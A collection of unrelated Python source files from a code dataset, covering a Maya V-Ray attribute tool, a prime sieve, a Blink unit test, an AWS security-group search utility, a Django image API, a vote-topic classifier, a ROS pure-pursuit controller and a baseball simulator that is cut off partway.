else: cmds.setAttr("%s.vraySubdivUVsAtBorders" % shape, 0)
else: cmds.setAttr("%s.vraySubdivUVs" % shape, 0)
if self.subDiv_static.checkState() == 2: cmds.setAttr("%s.vrayStaticSubdiv" % shape, 1)
else: cmds.setAttr("%s.vrayStaticSubdiv" % shape, 0)
else:
cmds.setAttr("%s.vraySubdivEnable" % shape, 0)
if self.disQuality.checkState() == 2:
mel.eval("vray addAttributesFromGroup %s vray_subquality %s" % (shape, onOff))
if onOff == 1:
if self.disQuality_override.checkState() == 2:
cmds.setAttr("%s.vrayOverrideGlobalSubQual" % shape, 1)
if self.disQuality_view.checkState() == 2: cmds.setAttr("%s.vrayViewDep" % shape, 1)
else: cmds.setAttr("%s.vrayViewDep" % shape, 0)
cmds.setAttr("%s.vrayEdgeLength" % shape, float(self.disQuality_edge.text()))
cmds.setAttr("%s.vrayMaxSubdivs" % shape, int(self.disQuality_max.text()))
else: cmds.setAttr("%s.vrayOverrideGlobalSubQual" % shape, 0)
if self.disControl.checkState() == 2:
mel.eval("vray addAttributesFromGroup %s vray_displacement %s" % (shape, onOff))
if onOff == 1:
if self.dis_none.checkState() != 2:
cmds.setAttr("%s.vrayDisplacementNone" % shape, 0)
cmds.setAttr("%s.vrayDisplacementType" % shape, int(self.dis_type.currentIndex()))
cmds.setAttr("%s.vrayDisplacementAmount" % shape, float(self.dis_amount.text()))
cmds.setAttr("%s.vrayDisplacementShift" % shape, float(self.dis_shift.text()))
if self.dis_continuity.checkState() != 2: cmds.setAttr("%s.vrayDisplacementKeepContinuity" % shape, 1)
else: cmds.setAttr("%s.vrayDisplacementKeepContinuity" % shape, 0)
if self.dis_waterLevel.checkState() != 2:
cmds.setAttr("%s.vrayEnableWaterLevel" % shape, 1)
cmds.setAttr("%s.vrayWaterLevel" % shape, float(self.dis_waterAmount.text()))
else: cmds.setAttr("%s.vrayEnableWaterLevel" % shape, 0)
print self.dis_type.currentIndex()
if self.dis_type.currentIndex() == 0:
cmds.setAttr("%s.vray2dDisplacementResolution" % shape, int(self.dis_texture.text()))
cmds.setAttr("%s.vray2dDisplacementPrecision" % shape, int(self.dis_precision.text()))
if self.dis_bounds.checkState() == 2: cmds.setAttr("%s.vray2dDisplacementTightBounds" % shape, 1)
else: cmds.setAttr("%s.vray2dDisplacementTightBounds" % shape, 0)
if self.dis_filter.checkState() == 2:
cmds.setAttr("%s.vray2dDisplacementFilterTexture" % shape, 1)
cmds.setAttr("%s.vray2dDisplacementFilterBlur" % shape, float(self.dis_filterblur.text()))
else: cmds.setAttr("%s.vray2dDisplacementFilterTexture" % shape, 0)
if self.dis_type.currentIndex() != 0:
if self.dis_boundsDropdown.currentIndex() == 1:
cmds.setAttr("%s.vrayDisplacementUseBounds" % shape, 1)
## cmds.setAttr("%s.vray2dDisplacementFilterBlur" % shape, float(self.dis_filterblur.text()))
## setAttr "pPlaneShape1.vrayDisplacementMinValue" -type double3 0.404501 0.404501 0.404501 ;
## setAttr "pPlaneShape1.vrayDisplacementMaxValue" -type double3 0.584268 0.584268 0.584268 ;
else: cmds.setAttr("%s.vrayDisplacementUseBounds" % shape, 0)
else:cmds.setAttr("%s.vrayDisplacementNone" % shape, 1)
if self.roundEdges.checkState() == 2:
mel.eval("vray addAttributesFromGroup %s vray_roundedges %s" % (shape, onOff))
if onOff == 1:
if self.round_round.checkState() == 2:
cmds.setAttr("%s.vrayRoundEdges" % shape, 1)
val = self.round_radius.text()
cmds.setAttr("%s.vrayRoundEdgesRadius" % shape, float(val))
else: cmds.setAttr("%s.vrayRoundEdges" % shape, 0)
if self.userAttr.checkState() == 2:
mel.eval("vray addAttributesFromGroup %s vray_user_attributes %s" % (shape, onOff))
if onOff == 1:
text = self.user_attr.text()
cmds.setAttr("%s.vrayUserAttributes" % shape, text, type="string")
if self.fogFade.checkState() == 2:
mel.eval("vray addAttributesFromGroup %s vray_fogFadeOut %s" % (shape, onOff))
if onOff == 1:
val = self.fog_radius.text()
cmds.setAttr("%s.vrayFogFadeOut" % shape, float(val))
if self.objectID.checkState() == 2:
mel.eval("vray addAttributesFromGroup %s vray_objectID %s" % (shape, onOff))
if onOff == 1:
cmds.setAttr("%s.vrayObjectID" % shape, int(self.obj_id.text()))
def vrayShapeAttrUI():
global myWindow
myWindow = dsVrayShapeAttr()
myWindow.show() |
15,746 | 9cb60d1e90485816ccf2f2b8e83c9c0610f93770 | # -*- coding: utf-8 -*-
# 求1000,0000以内的所有质数,Euler筛数法,每个数只会被筛一次,并且是被它的最小的质因子筛去,复杂度O(N)
# 1000,0000以内的素数个数是664579,耗时6.129s
maxn = 10000000
checked = [False] * (maxn+1)
P = []
for i in range(2, maxn):
if not checked[i]:
P.append(i)
for p in P:
if p * i > maxn:
break
checked[p*i] = True
if i % p == 0:
break
print(len(P))
|
15,747 | 27bc20dce2c25da5eab5642ab5ee270105c41320 | # Copyright (C) 2010 Chris Jerdonek (cjerdonek@webkit.org)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from blinkpy.common.system.filesystem import FileSystem
from blinkpy.common.system.log_testing import LoggingTestCase
from blinkpy.style.checker import ProcessorBase
from blinkpy.style.filereader import TextFileReader
class TextFileReaderTest(LoggingTestCase):
class MockProcessor(ProcessorBase):
"""A processor for test purposes.
This processor simply records the parameters passed to its process()
method for later checking by the unittest test methods.
"""
def __init__(self):
self.processed = []
"""The parameters passed for all calls to the process() method."""
def should_process(self, file_path):
return not file_path.endswith('should_not_process.txt')
def process(self, lines, file_path, test_kwarg=None):
self.processed.append((lines, file_path, test_kwarg))
def setUp(self):
LoggingTestCase.setUp(self)
# FIXME: This should be a MockFileSystem once TextFileReader is moved entirely on top of FileSystem.
self.filesystem = FileSystem()
self._temp_dir = str(self.filesystem.mkdtemp())
self._processor = TextFileReaderTest.MockProcessor()
self._file_reader = TextFileReader(self.filesystem, self._processor)
def tearDown(self):
LoggingTestCase.tearDown(self)
self.filesystem.rmtree(self._temp_dir)
def _create_file(self, rel_path, text):
"""Create a file with given text and return the path to the file."""
# FIXME: There are better/more secure APIs for creating tmp file paths.
file_path = self.filesystem.join(self._temp_dir, rel_path)
self.filesystem.write_text_file(file_path, text)
return file_path
def _passed_to_processor(self):
"""Return the parameters passed to MockProcessor.process()."""
return self._processor.processed
def _assert_file_reader(self, passed_to_processor, file_count):
"""Assert the state of the file reader."""
self.assertEqual(passed_to_processor, self._passed_to_processor())
self.assertEqual(file_count, self._file_reader.file_count)
def test_process_file__does_not_exist(self):
try:
self._file_reader.process_file('does_not_exist.txt')
except SystemExit as err:
self.assertEqual(str(err), '1')
else:
self.fail('No Exception raised.')
self._assert_file_reader([], 1)
self.assertLog(["ERROR: File does not exist: 'does_not_exist.txt'\n"])
def test_process_file__is_dir(self):
temp_dir = self.filesystem.join(self._temp_dir, 'test_dir')
self.filesystem.maybe_make_directory(temp_dir)
self._file_reader.process_file(temp_dir)
# Because the log message below contains exception text, it is
# possible that the text varies across platforms. For this reason,
# we check only the portion of the log message that we control,
# namely the text at the beginning.
log_messages = self.logMessages()
# We remove the message we are looking at to prevent the tearDown()
# from raising an exception when it asserts that no log messages
# remain.
message = log_messages.pop()
self.assertTrue(
message.startswith(
"WARNING: Could not read file. Skipping: '%s'\n " % temp_dir))
self._assert_file_reader([], 1)
def test_process_file__should_not_process(self):
file_path = self._create_file('should_not_process.txt', 'contents')
self._file_reader.process_file(file_path)
self._assert_file_reader([], 1)
def test_process_file__multiple_lines(self):
file_path = self._create_file('foo.txt', 'line one\r\nline two\n')
self._file_reader.process_file(file_path)
processed = [(['line one\r', 'line two', ''], file_path, None)]
self._assert_file_reader(processed, 1)
def test_process_file__file_stdin(self):
file_path = self._create_file('-', 'file contents')
self._file_reader.process_file(file_path=file_path, test_kwarg='foo')
processed = [(['file contents'], file_path, 'foo')]
self._assert_file_reader(processed, 1)
def test_process_file__with_kwarg(self):
file_path = self._create_file('foo.txt', 'file contents')
self._file_reader.process_file(file_path=file_path, test_kwarg='foo')
processed = [(['file contents'], file_path, 'foo')]
self._assert_file_reader(processed, 1)
def test_process_paths(self):
# We test a list of paths that contains both a file and a directory.
dir = self.filesystem.join(self._temp_dir, 'foo_dir')
self.filesystem.maybe_make_directory(dir)
file_path1 = self._create_file('file1.txt', 'foo')
rel_path = self.filesystem.join('foo_dir', 'file2.txt')
file_path2 = self._create_file(rel_path, 'bar')
self._file_reader.process_paths([dir, file_path1])
processed = [(['bar'], file_path2, None), (['foo'], file_path1, None)]
self._assert_file_reader(processed, 2)
def test_count_delete_only_file(self):
self._file_reader.count_delete_only_file()
delete_only_file_count = self._file_reader.delete_only_file_count
self.assertEqual(delete_only_file_count, 1)
|
15,748 | b730035e740aa806145c3f0849f345f17ac5d983 | #!/usr/bin/env python
import boto3
import argparse
from ipaddress import IPv4Network
import json
def prepare_arguments():
parser = argparse.ArgumentParser(
description="AWS VPC Security Groups Search Utility" \
"\n\nAuthor: Tony P. Hadimulyono (github.com/tonyprawiro)",
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('--profile',
metavar="profile-name",
type=str,
nargs='?',
default="default",
help="AWS credential profile to select, default is 'default'. Check your ~/.aws/credentials file.")
parser.add_argument('--search',
metavar="search-term",
type=str,
nargs='?',
default='0.0.0.0/0',
help="Search term e.g. 10.20.30.40/32, default is 0.0.0.0/0 which will match any CIDR.")
parser.add_argument('--egress',
metavar="Yes",
type=str,
nargs='?',
default='No',
help="Search egress rules too, if omitted then egress is not searched")
parser.add_argument('--regions',
metavar="region_name",
type=str,
nargs='*',
default=['all'],
help="Region(s) to search for. Default is all regions.")
return parser.parse_args()
def get_all_regions(profile_name):
arr = []
session = boto3.session.Session(region_name='us-east-1', profile_name=profile_name)
ec2 = session.client('ec2')
response = ec2.describe_regions()
regs = response["Regions"]
for region in regs:
arr.append(region["RegionName"])
return arr
def evaluate_network(subnetwork, network):
if subnetwork == '0.0.0.0/0' or network == '0.0.0.0/0':
return True
return IPv4Network(unicode(subnetwork, 'utf-8')).overlaps(IPv4Network(unicode(network, 'utf-8')))
def main():
args = prepare_arguments()
regions = args.regions
if regions == ["all"]:
regions = get_all_regions(args.profile)
result = dict()
for region in regions:
session = boto3.session.Session(region_name=region, profile_name=args.profile)
ec2 = session.client('ec2')
response = ec2.describe_security_groups()
# Get the security groups
security_groups = []
try:
security_groups = response["SecurityGroups"]
except:
pass
# Iterate the security groups
for security_group in security_groups:
ip_permissions = security_group["IpPermissions"]
for ip_permission in ip_permissions:
ip_ranges = ip_permission["IpRanges"]
for ip_range in ip_ranges:
cidr_ip = ip_range["CidrIp"]
if cidr_ip != 'None':
is_overlapping = evaluate_network(args.search, cidr_ip)
if is_overlapping:
if not region in result:
result[region] = dict()
if not security_group["GroupId"] in result[region]:
result[region][security_group["GroupId"]] = dict()
result[region][security_group["GroupId"]]["GroupName"] = security_group["GroupName"]
if not "Ingress" in result[region][security_group["GroupId"]]:
result[region][security_group["GroupId"]]["Ingress"] = []
if cidr_ip not in result[region][security_group["GroupId"]]["Ingress"]:
result[region][security_group["GroupId"]]["Ingress"].append(cidr_ip)
if args.egress != 'No':
ip_permissions_egress = security_group["IpPermissionsEgress"]
for ip_permission_egress in ip_permissions_egress:
ip_ranges = ip_permission_egress["IpRanges"]
for ip_range in ip_ranges:
cidr_ip = ip_range["CidrIp"]
if cidr_ip != 'None':
is_overlapping = evaluate_network(args.search, cidr_ip)
if is_overlapping:
if not region in result:
result[region] = dict()
if not security_group["GroupId"] in result[region]:
result[region][security_group["GroupId"]] = dict()
result[region][security_group["GroupId"]]["GroupName"] = security_group["GroupName"]
if not "Egress" in result[region][security_group["GroupId"]]:
result[region][security_group["GroupId"]]["Egress"] = []
if cidr_ip not in result[region][security_group["GroupId"]]["Egress"]:
result[region][security_group["GroupId"]]["Egress"].append(cidr_ip)
del session
print json.dumps(result,
sort_keys=True,
indent=2)
if __name__ == "__main__":
main()
|
15,749 | 17a845484f15e3ea91bc54fcfaaa360a87e1aea7 | from django.shortcuts import render
from rest_framework.parsers import MultiPartParser, FormParser,FileUploadParser
from rest_framework import viewsets, generics
from rest_framework.response import Response
from rest_framework import status
from orders.p_models.image_model import KImage
from orders.p_serializers.image_serializer import ImageSerializer
class ImageViewSet(viewsets.ModelViewSet):
queryset = KImage.objects.all()
serializer_class = ImageSerializer
parser_classes = (FormParser, MultiPartParser, FileUploadParser) # set parsers if not set in settings. Edited
def create(self, request, *args, **kwargs):
images_arr = []
for image in request.FILES:
image_serializer = ImageSerializer(data= {'description': request.data.get('description'), 'image': request.FILES[image]})
if image_serializer.is_valid():
image_serializer.save()
images_arr.append(image_serializer.instance.id)
return Response({'image_ids': images_arr}, status=status.HTTP_201_CREATED)
else:
return Response(image_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
if request.FILES:
request.data['images'] = request.FILES
serializer = self.get_serializer(self.get_object(), data=request.data, partial=True)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
return Response(serializer.data)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
instance.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
def perform_destroy(self, instance):
for e in instance.images.all():
instance.images.remove(e)
KImage.objects.get(id=e.id).delete()
|
15,750 | 09c6261b6d4b3e90add5c4dd9a1a3ec60ce5ebac | from ccu_utilities import *
from ccu_gen_beta.models import *
import pyUtilities as pyU
from prediction3 import classify
def genericAmendText(text):
text = text.lower()
if text.find('nature') > -1:
return True
if text.find('not available') > -1:
return True
if text.find('instructions') > -1:
return True
if text.find('clarify standing') > -1:
return True
return False
def findJonesSubTopicVotesUnique(vote):
print vote
if vote.amendment:
#use text of amendment to find subtopics....
amendmentText = None
if not genericAmendText(vote.amendment.purpose):
amendmentText = vote.amendment.purpose
else:
return
if not genericAmendText(vote.amendment.description) and amendmentText != vote.amendment.description:
amendmentText = amendmentText + ' ' + vote.amendment.description
if vote.amendment.text and not genericAmendText(vote.amendment.text):
amendmentText = amendmentText + ' ' + vote.amendment.text
if not amendmentText:
return
amendmentText = amendmentText.split('as follows')[0]
#get all topics of bill to kind of narrow things down a bit....
subjects = vote.bill.subjects.all()
topics = []
for subject in subjects:
for subtopic in subject.subtopics.all():
if subtopic.topic not in topics:
#print subtopic
topics.append(subtopic.topic)
if topics == []: return
subtopicsD = findJonesSubTopicPresUniqueWords(amendmentText,topics,score=0.14)
print subtopicsD
elif vote.bill.summary.strip() != "": #if aboutBillOrRes(vote.voteType.voteType)s:
#print 'HERE'
vote.subtopics = []
#just assign all subtopics of the bill to the vote...
lsSubtopics = []
topics = []
for subject in vote.bill.subjects.all():
#print 'SUBJECT %s' % subject
for subtopic in subject.subtopics.all():
#print ' SUBTOPIC %s w/ topic %s' % (subtopic.name,subtopic.topic.name)
if subtopic not in lsSubtopics:
lsSubtopics.append(subtopic)
if subtopic.topic not in topics:
topics.append(subtopic.topic)
#print vote.bill.summary
#print topics
subtopicsD = findJonesSubTopicPresUniqueWords(vote.bill.summary,topics,score=0.14)
#print subtopicsD
sameAsLast=True
print subtopicsD
def findJonesSubTopicVotes(vote):
print vote
if vote.amendment:
#use text of amendment to find subtopics....
amendmentText = None
if not genericAmendText(vote.amendment.purpose):
amendmentText = vote.amendment.purpose
else:
return
if not genericAmendText(vote.amendment.description) and amendmentText != vote.amendment.description:
amendmentText = amendmentText + ' ' + vote.amendment.description
if vote.amendment.text and not genericAmendText(vote.amendment.text):
amendmentText = amendmentText + ' ' + vote.amendment.text
if not amendmentText:
return
amendmentText = amendmentText.split('as follows')[0]
#get all topics of bill to kind of narrow things down a bit....
subjects = vote.bill.subjects.all()
topics = []
for subject in subjects:
for subtopic in subject.subtopics.all():
if subtopic.topic not in topics:
#print subtopic
topics.append(subtopic.topic)
if topics == []: return
subtopicsD = findJonesSubTopicPres(amendmentText,topics,score=0.14)
print subtopicsD
elif vote.bill.summary.strip() != "": #if aboutBillOrRes(vote.voteType.voteType)s:
#print 'HERE'
vote.subtopics = []
#just assign all subtopics of the bill to the vote...
lsSubtopics = []
topics = []
for subject in vote.bill.subjects.all():
#print 'SUBJECT %s' % subject
for subtopic in subject.subtopics.all():
#print ' SUBTOPIC %s w/ topic %s' % (subtopic.name,subtopic.topic.name)
if subtopic not in lsSubtopics:
lsSubtopics.append(subtopic)
if subtopic.topic not in topics:
topics.append(subtopic.topic)
#print vote.bill.summary
#print topics
subtopicsD = findJonesSubTopicPres(vote.bill.summary,topics,score=0.14)
#print subtopicsD
sameAsLast=True
print subtopicsD
def cleanText(text):
import string
words= ['strike','year','resolut','legis','table','bill','pass','amend','title','subtitle','specif','author','prohibit','juris','respons','submit','enhance','include','publish','requir','set']
words.extend(['add','continue','event','purpose','remov','establ','instruct','develop','designate','direct','provide','senate'])
words.extend(['congress','report','plan','exclude','confirm','forth','includ','consider','secretar','report','implemen'])
words.extend(['h.r.','section','sub','date','act','regard','earli','early','use','certain','west','east','north','south','clarify','propos','nation'])
words.extend(['introduc','approp','admin','process','affect','promote','program','prescribe','assist','reduce','facilit','communit','committee','project'])
words.extend(['revis','improv','increase','likel','carry','assoc','agree','control','develop','service','approv','program','participate','make','recommend','change','integra'])
#words.extend(['incr','limit','def','revis','alloc','program','leverag','provid','encourag','meet','federal','nation'])
words.extend(['primar'])
text = text.lower()
text = text.split('as follows')[0]
reTitle1 = re.compile('mr.\s*\S*,',re.I)
reTitle2 = re.compile('ms.\s*\S*,',re.I)
reTitle3 = re.compile('mrs.\s*\S*,',re.I)
reParen = re.compile("\(.*?\)")
reNum = re.compile('\d+')
text = re.sub(reTitle1,' ',text)
text = re.sub(reTitle2,' ',text)
text = re.sub(reTitle3,' ',text)
text = re.sub(reParen,'' ,text)
text = re.sub(reNum,'',text)
text = text.replace('mr.','').replace('ms.','').replace('mrs.','')
for rep in Rep.objects.all():
text = text.replace(rep.lastName.lower(),'')
for word in words:
reWord = re.compile('\s+' + word + '\w*\s*')
text = re.sub(reWord,' ',text)
for stateName in stateAbbrevs.values():
reWord = re.compile(stateName + '\w*\s*',re.I)
text = re.sub(reWord,'',text)
#print 'after statenames'
#print text
text = pyU.removePunctuation(text)
text = pyU.sStripStopWordsAll(text)
#print 'after punc and strip words'
#print text
return text
#ADD SOMETHING WHEN BILL OR AMENDMENT HAS ALREADY BEEN PROCESSED...
def findJonesSubTopicVotesSVM(vote):
print ""
print ""
print "------------------------------------------"
print vote
#if vote.amendment:
#vote.amendment.subtopicsAssigned=False
#if vote.bill:
#vote.bill.subtopicsAssigned=False
if vote.amendment and not vote.amendment.subtopicsAssigned:
#return
#use text of amendment to find subtopics....
amendmentText = None
if not genericAmendText(vote.amendment.purpose):
amendmentText = vote.amendment.purpose
else:
print 'generic amendment'
print vote.amendment.purpose
return
if not genericAmendText(vote.amendment.description) and amendmentText != vote.amendment.description:
amendmentText = amendmentText + ' ' + vote.amendment.description
if vote.amendment.text and not genericAmendText(vote.amendment.text):
amendmentText = amendmentText + ' ' + vote.amendment.text
if not amendmentText:
print 'no amendment text'
return
print 'AMENDMENT'
print amendmentText
amendmentText = cleanText(amendmentText)
print "---------------"
print amendmentText
subtopics = classify(amendmentText)
#print subtopics
vote.amendment.subtopics = subtopics
vote.amendment.subtopicsAssigned=True
vote.amendment.save()
print vote.amendment.subtopics.all()
elif vote.bill.summary.strip() != "" and not vote.bill.subtopicsAssigned: #if aboutBillOrRes(vote.voteType.voteType)s:
subjects = vote.bill.subjects.all()
topics = []
for subject in subjects:
for subtopic in subject.subtopics.all():
if subtopic.topic not in topics:
#print subtopic
topics.append(subtopic.topic)
print 'BILL'
summary = vote.bill.summary
if len(summary) > 5000:
summary = summary[0:5000]
print summary
print "----------------------"
#print len(vote.bill.summary)
subtopics = []
for sentence in pyU.lsSplitIntoSentences(summary):
print sentence
sentence = cleanText(sentence)
print sentence
subtopicsNew = classify(sentence)
subtopics.extend(subtopicsNew)
print subtopicsNew
#print subtopics
vote.bill.subtopics = subtopics
vote.bill.subtopicsAssigned=True
vote.bill.save()
print vote.bill.subtopics.all()
elif (vote.bill and vote.bill.subtopicsAssigned) or (vote.amendment and vote.amendment.subtopicsAssigned):
print 'ALREADY ASSIGNED'
else:
print 'NO AMENDMENT AND NO BILL PURPOSE'
def getSenatorsCongressSubtopic(congress,subtopicID):
strSenators=""
lsTrack=[]
for rep in Rep.objects.filter(senator=True,congress__number=congress).order_by('lastName'):
obj1 = None
obj2 = None
obj3 = None
obj4 = None
#print rep.party
if rep.party.lower().find('d') > -1:
obj1 = AnomVoters.objects.filter(vote__bill__congress=congress,demVoters__rep=rep,vote__bill__subtopics__code=subtopicID)
obj2 = AnomVoters.objects.filter(vote__bill__congress=congress,demVoters__rep=rep,vote__amendment__subtopics__code=subtopicID)
else:
obj3 = AnomVoters.objects.filter(vote__bill__congress=congress,repVoters__rep=rep,vote__bill__subtopics__code=subtopicID)
obj4 = AnomVoters.objects.filter(vote__bill__congress=congress,repVoters__rep=rep,vote__amendment__subtopics__code=subtopicID)
print rep
print obj1
if obj1 != None:
print 'HERE'
print obj2
print obj3
print obj4
print ""
if (obj1 and obj1.count() == 0 and obj2.count() == 0) or (obj3 and obj3.count() == 0 and obj4.count() == 0):
continue
if rep.repID not in lsTrack:
strSenators = strSenators + ("%s:%s*" % (rep.repID,rep.lastName))
lsTrack.append(rep.repID)
return strSenators
if __name__ == '__main__':
print getSenatorsCongressSubtopic(112,1911)
# from JulianTime import convertDateTimeJul
# congress112 = Congress.objects.filter(number=112)[0]
# dtObj1 = congress112.beginDate
# dtObj1 = datetime.datetime(dtObj1.year,dtObj1.month,dtObj1.day)
# dtObj2 = congress112.endDate
# dtObj2 = datetime.datetime(dtObj2.year,dtObj2.month,dtObj2.day)
# print convertDateTimeJul(dtObj1)
# print convertDateTimeJul(dtObj2)
# assert 0
#
#print NAICSIndustryReport.objects.filter(vote=Vote.objects.get(number=288,bill__number=3082))
#pass
#for vote in Vote.objects.filter(bill__congress__number=112):
#findJonesSubTopicVotesSVM(vote)
#for vote in Vote.objects.filter(bill__congress__number=111):
#findJonesSubTopicVotesSVM(vote)
|
15,751 | 2a20c9bbb791f4cd9732d1bdaad7335c00e79f26 | n = int(input())
dp = [0]*(n+1)
dp[0] = 1
for i in range(1,n+1):
for x in range(1,7):
if i - x >= 0:
dp[i] += dp[i-x] % (10**9 + 7)
print(dp[n]% (10**9 + 7))
|
15,752 | 20cdff59584739f4bd42b3f0dafbb262a20a1f0d | import ROOT
def declareHistos():
print('Declaring histograms')
histos = {}
nJets_hist = ROOT.TH1D('nJets_hist', 'Number of Jets (RECO)', 20, 0, 20)
nJets_hist.GetXaxis().SetTitle('Number of Jets')
nJets_hist.GetYaxis().SetTitle('Number of Events')
histos['nJets_hist'] = nJets_hist
leadingJetPt_hist = ROOT.TH1F('leadingJetPt_hist', 'Leading Jet p_{T} (RECO)', 50, 0, 500)
leadingJetPt_hist.GetXaxis().SetTitle('p_{T} (GeV)')
leadingJetPt_hist.GetYaxis().SetTitle('Number of Events')
histos['leadingJetPt_hist'] = leadingJetPt_hist
trailingJetPt_hist = ROOT.TH1F('trailingJetPt_hist', 'Trailing Jet p_{T} (RECO)', 50, 0, 500)
trailingJetPt_hist.GetXaxis().SetTitle('p_{T} (GeV)')
trailingJetPt_hist.GetYaxis().SetTitle('Number of Events')
histos['trailingJetPt_hist'] = trailingJetPt_hist
print('Histograms declared')
return histos
|
15,753 | de7d520162b7ac6d9dd4030dc29bef414c4f6c52 | #!/usr/bin/env python
import rospy
import sys
import os
from ackermann_msgs.msg import AckermannDriveStamped
from std_msgs.msg import Float32MultiArray, MultiArrayDimension, MultiArrayLayout
import numpy as np
import math
# TODO: import ROS msg types and libraries
LOOKAHEAD = 1.2
Waypoint_CSV_File_Path = '/home/zach/catkin_ws/src/lab6/waypoints/levine-waypoints.csv'
Odom_Topic = rospy.get_param("/pose_topic")
Car_Length = 0.32
class PurePursuit(object):
def __init__(self):
global Waypoint_CSV_File_Path
global LOOKAHEAD
global Car_Length
self.L = LOOKAHEAD
self.car_length = Car_Length
np.set_printoptions(threshold=sys.maxsize)
self.iter = 0
rospy.Subscriber("/pure_pursuit", Float32MultiArray, self.pose_callback, queue_size=1) #TODO
self.drive_pub = rospy.Publisher('drive', AckermannDriveStamped, queue_size=1)
def FindNavIndex(self, distances, L):
min_index = np.argmin(distances)
differences = np.subtract(distances,L)
next_differences = np.roll(differences, -1)
i = min_index
while 1:
if i > (len(differences)-1):
i = 0
if np.sign(differences[i]) != np.sign(next_differences[i]):
return i
else:
i += 1
def FindNavPoint(self, goal_index, magnitudes, waypoints, L):
if goal_index == len(waypoints)-1:
next_index = 0
else:
next_index = goal_index + 1
mi = 0
m1 = magnitudes[goal_index] - L
m2 = magnitudes[next_index] - L
x1 = waypoints[goal_index][0]
x2 = waypoints[next_index][0]
y1 = waypoints[goal_index][1]
y2 = waypoints[next_index][1]
xi = np.interp(mi, [m1,m2], [x1, x2])
yi = np.interp(mi, [m1,m2], [y1, y2])
goal_point = np.asarray([xi,yi])
return goal_point
def pose_callback(self, wp_msg):
print(self.iter)
self.iter += 1
height = wp_msg.layout.dim[0].size
width = wp_msg.layout.dim[1].size
data = np.asarray(wp_msg.data)
self.Waypoints_Master = np.reshape(data, (height, width))
L = self.L
car_length = self.car_length
waypoints = self.Waypoints_Master[0:, 1:]
car_point = self.Waypoints_Master[-1, 1:]
angle_z = self.Waypoints_Master[0, 0]
magnitudes = np.asarray([np.linalg.norm(waypoint - car_point) for waypoint in waypoints])
goal_index = self.FindGoalIndex(magnitudes, L)
goal_point = self.FindGoalPoint(goal_index, magnitudes, waypoints, L)
x = (goal_point[0] - car_point[0])*math.cos(angle_z) + (goal_point[1] - car_point[1])*math.sin(angle_z)
y = -(goal_point[0] - car_point[0])*math.sin(angle_z) + (goal_point[1] - car_point[1])*math.cos(angle_z)
goal_for_car = np.asarray([x, y])
d = np.linalg.norm(goal_for_car)
turn_radius = (d**2)/(2*(goal_for_car[1]))
steering_angle = math.atan(car_length/turn_radius)
if steering_angle > 0.4189:
steering_angle = 0.4189
elif steering_angle < -0.4189:
steering_angle = -0.4189
speed = 4.85
self.ack = AckermannDriveStamped()
self.ack.header.frame_id = 'steer'
self.ack.drive.steering_angle = steering_angle
self.ack.drive.speed = speed
self.ack.header.stamp = rospy.Time.now()
self.drive_pub.publish(self.ack)
def main():
rospy.init_node('pure_pursuit_node')
pp = PurePursuit()
rate = rospy.Rate(7)
rate.sleep()
rospy.spin()
if __name__ == '__main__':
main()
|
15,754 | 0458702c3bdc9402d0cd2d3a452590885fba18ff | class Solution(object):
def isPalindrome(self, s):
"""
:type s: str
:rtype: bool
"""
l = []
if s == "":
return True
else:
for i in s:
if i.isalnum():
l.append(i.lower())
return l == l[::-1] |
15,755 | 1b00fc90fb2dd21a3d9cc147e2431eb69dc5f151 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Title: Simple Baseball Simulator
Created on Sat Mar 30 23:59:36 2019
@author: edwardmwadsworth
"""
from random import randint
import pandas as pd
# GLOBAL VARIABLES
# GSB stands for Game Status Board.
# Initialize GSB
Team=['VISITOR','HOME']
def InitializeGSB():
global GSB
GSB = dict( Inning = 1,
Score = {Team[0]:0, Team[1]:0},
Team_at_Bat = Team[0],
Bat_Team_Status = dict(Outs = 0,
Bases = [0,0,0], # 1st, 2nd, 3rd
Batter_Up = dict(Strikes=0, Balls=0))
)
# PROGRAM FUNCTIONS
def Game_Over():
Game_Over = True
if GSB['Inning']<9:
Game_Over = False
# If we're in the bottom of 9th, and the first team is trailing, the game is over
if GSB['Inning']==9:
if GSB['Team_at_Bat']==Team[0]:
Game_Over = False
if GSB['Bat_Team_Status']['Outs'] < 3 and GSB['Score'][Team[0]] > GSB['Score'][Team[1]]:
Game_Over = False
# tie game at bottom of ninth:
if GSB['Score'][Team[0]] == GSB['Score'][Team[1]]:
Game_Over = False
# overtime option, continue until one team scores
if GSB['Inning'] > 9 and GSB['Score'][Team[0]] == GSB['Score'][Team[1]]:
Game_Over = False
return Game_Over
def Team_Up():
GSB['Bat_Team_Status'] = dict(Outs = 0,
Bases = [0,0,0], # 1st, 2nd, 3rd
Batter_Up = dict(Strikes=0, Balls=0)) # Always re-initialize batting team round stats
if GSB['Team_at_Bat'] == Team[0]: # If VISITOR was at bat at top
GSB['Team_at_Bat'] = Team[1] # HOME goes to bat at bottom of inning
else:
